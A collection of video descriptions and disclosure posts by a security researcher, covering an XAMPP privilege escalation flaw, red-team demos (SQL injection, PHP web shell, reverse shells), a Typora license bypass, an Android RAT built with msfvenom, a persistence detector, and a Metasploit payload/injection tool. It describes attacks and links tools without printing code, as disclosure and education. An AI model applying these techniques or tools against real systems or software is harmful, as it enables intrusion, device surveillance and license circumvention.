A serious misconfiguration in default XAMPP installations on Windows has been identified - and it’s not a minor oversight. This is a privilege escalation risk with real world impact potential.

🔍 What’s the Issue?

Security researcher Johnny Watts has uncovered a flaw in how the Apache service is configured by default in XAMPP on Windows systems.

👉 By default, Apache runs under the LocalSystem account (NT AUTHORITY\SYSTEM)
👉 This is one of the highest privilege levels available on a Windows machine

This means a web-facing service is operating with maximum system level permissions - a fundamentally dangerous design choice.

⚠️ Why This Matters:

Running Apache as SYSTEM dramatically expands the blast radius of any compromise.

If an attacker gains even limited access through a web vulnerability, they could:

💥 Access sensitive files, configs, and databases
💥 Execute arbitrary code with SYSTEM level privileges
💥 Fully compromise the host machine
💥 Pivot deeper into the network for lateral movement

This is not theoretical - it's a classic privilege escalation pathway created by poor defaults.

🧠 Security Breakdown
Attack Surface: Web-facing Apache service
Privilege Context: SYSTEM (highest level)
Risk Type: Privilege Escalation to Full System Compromise
Root Cause: Insecure default "Log On As" configuration

🧪 Proof of Concept (PoC)
A controlled and ethical PoC has been developed to demonstrate the real impact of this misconfiguration.

✔️ Shows how existing vulnerabilities can be chained
✔️ Demonstrates execution within SYSTEM context
✔️ Highlights how quickly systems can be fully compromised

🛡️ Recommended Mitigation

Do NOT run Apache as SYSTEM. Immediate action should include:

✅ Reconfigure the Apache service to run under a low-privileged user account
✅ Apply the principle of least privilege
✅ Audit service configurations across environments
✅ Harden XAMPP deployments before exposing them to any network

📎 Full Disclosure & Fix

For full technical details, PoC breakdown, and remediation steps:
👉 https://github.com/kaotickj/Apache-Service-XAMPP-WindowsPrivEsc-Disclosure

📢 Final Take

Default configurations should never introduce critical security risk - yet here we are.

If you’re running XAMPP in any capacity (dev, staging, or worse - production), review this immediately. The cost of ignoring it is system level compromise.

In this video, I demonstrate using a few of my red-team tools for recon and exploiting a vulnerable web application : Joomla 3.3.0, SQL Injection/Session hijack.

NetSentinel Network Recon tool which you can find at: https://github.com/kaotickj/NetSentinel

JoomHeist: https://github.com/kaotickj/JoomHeist

The Not So Simple PHP Command Shell: https://github.com/kaotickj/The-Not-So-Simple-PHP-Command-Shell

K-Sploit: https://github.com/kaotickj/K-Sploit

For the underlying vulnerability info, see: https://nvd.nist.gov/vuln/detail/CVE-2015-7297

For the privileged access flaw in all versions of Xampp, see my report at: https://github.com/kaotickj/Apache-Service-XAMPP-WindowsPrivEsc-Disclosure

### Disclaimer: This video is for educational and demonstration purposes only. The target hosts featured in this video are intentionally vulnerable virtual machines running in my own isolated testing lab. Nothing in this video is intended for unlawful use cases.

Important Disclaimer: This demonstration was performed in a controlled, isolated virtual lab on systems I own. Do not use techniques shown in this video against systems for which you do not have written authorization. The code and tools shown are intended for authorized security testing, education, and research only. In this video I demonstrate the Linux-target version of my tool — The Not-So-Simple PHP Command Shell (linux-nsscmdshell.php) — against a deliberately vulnerable web application (“Online Learning Management System”) running in an isolated VM lab.

Typora License Validation Bypass (Public Disclosure – CVE Pending) CVE Request 1891916 for CVE ID This video demonstrates a security vulnerability in Typora's license enforcement logic. The issue was responsibly disclosed to the vendor with no corrective action taken. This video is part of a Coordinated Vulnerability Disclosure process. No illegal activity is demonstrated or encouraged. Security Issue: Typora License Bypass via Client-Side JavaScript Tampering (Public Disclosure) Affected Version: Typora for Windows x64, verified on `v1.10.8.0`. Earlier versions may also be affected. Summary Typora’s license validation mechanism is implemented entirely in client-side JavaScript. A trivial modification to a single line in `LicenseIndex.*.chunk.js` allows full and persistent bypass of the license enforcement logic, enabling unauthorized users to activate the application without a valid key.

This video demonstrates how malicious actors can remotely access and control a mobile device using a Trojanized APK — a Remote Access Trojan (RAT) generated with msfvenom and controlled through Metasploit Meterpreter. The purpose of this demonstration is to raise awareness about how easily an unsuspecting user can be compromised if they install untrusted apps, enable unknown sources, or bypass security warnings. 🔍 In this video you’ll see how attackers can:

• Access contacts, SMS messages, and call logs

• Use microphone and camera features remotely

• Attempt privilege escalation (su/root)

• Stream video from the device

• Monitor device activity

• Interact with the phone as if they physically possessed it

⚠️ Important: This is a controlled laboratory demonstration for cybersecurity education. Remote Access Trojans (RATs) are malicious by definition, and unauthorized access to any device is illegal. This video exists to help users, students, and professionals understand how these attacks happen - so they can better defend against them. 🛡️ How to protect yourself from these attacks:

• Never install APKs from outside trusted stores

• Do not bypass Android’s security warnings

• Keep Play Protect and antivirus enabled

• Review app permissions carefully

• Avoid “modded apps,” pirated apps, or unknown utilities

• Keep your device updated with the latest security patches

🛡️ Windows Registry Persistence Detector in Action!️ 🛠️

This video demonstrates how to use my Windows Registry Persistence Detector to uncover malicious backdoor persistence hidden in the Windows registry. The tool scans for suspicious entries, including:
✅ PowerShell commands embedded in registry keys
✅ Base64-encoded or obfuscated payloads

Super useful for blue teamers, threat hunters, or curious sysadmins.

🔗 Get the Tool:
Fork, clone, or download it here:
👉 https://github.com/kaotickj/persistenceDetector

💫 While you’re there, don’t forget to ⭐ star the repo and 👁️‍🗨️ watch it to stay updated!

Demonstrating usage of Armitage to apply GUI to msf tasks. In this demonstration, I use a known sql injection vulnerability to compromise credentials and login to the Learning Management system, the found a new vulnerability - arbitrary file upload allowing me to further compromise the system and gain a reverse tcp shell.

Optimized for use in Kali Linux, KSploit is a user friendly menu driven control panel in which to drive many metasploit tasks. KSploit simplifies repetitive metasploit functions such as generating payloads, deploying listeners, and injecting msf payloads into Windows exectuables. Requires metasploit framework

Get KSploit at https://github.com/kaotickj/K-Sploit

For complete documentation see https://github.com/kaotickj/K-Sploit/wiki

Exploits, payloads, listeners for:
🖥Windows 🐧 Linux 🍎 Mac 🤖 Android

👂 Listeners:
Use the listeners menu to craft and quickly deploy metasploit listeners. Choose from Windows x86/x64, Linux x86/x64, Mac/OSX, Bash, Meterpreter, and Netcat listeners.

💰 Payloads Use the payloads menu to quickly and easily craft metasploit payloads for a wide variety of targets. Payload options for meterpreter, windows x86/x64, linux x86/x64, mac/osx, android, and python.

⌛ Persistence Scripts Use the persistence scripts menu to craft persistence scripts for windows x64 and android.

💉 Windows Executable Payload Injection: Use the windows executable injection menu to inject metasploit payloads into windows executables.